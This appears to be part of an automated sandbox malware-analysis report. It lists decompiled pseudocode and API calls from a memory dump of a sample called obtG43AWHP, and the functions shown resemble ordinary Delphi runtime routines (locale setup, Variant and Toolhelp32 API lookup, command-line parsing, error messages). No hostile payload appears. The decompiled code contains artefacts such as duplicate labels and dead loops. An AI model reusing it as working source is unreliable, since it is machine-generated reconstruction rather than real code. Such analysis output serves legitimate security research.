    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
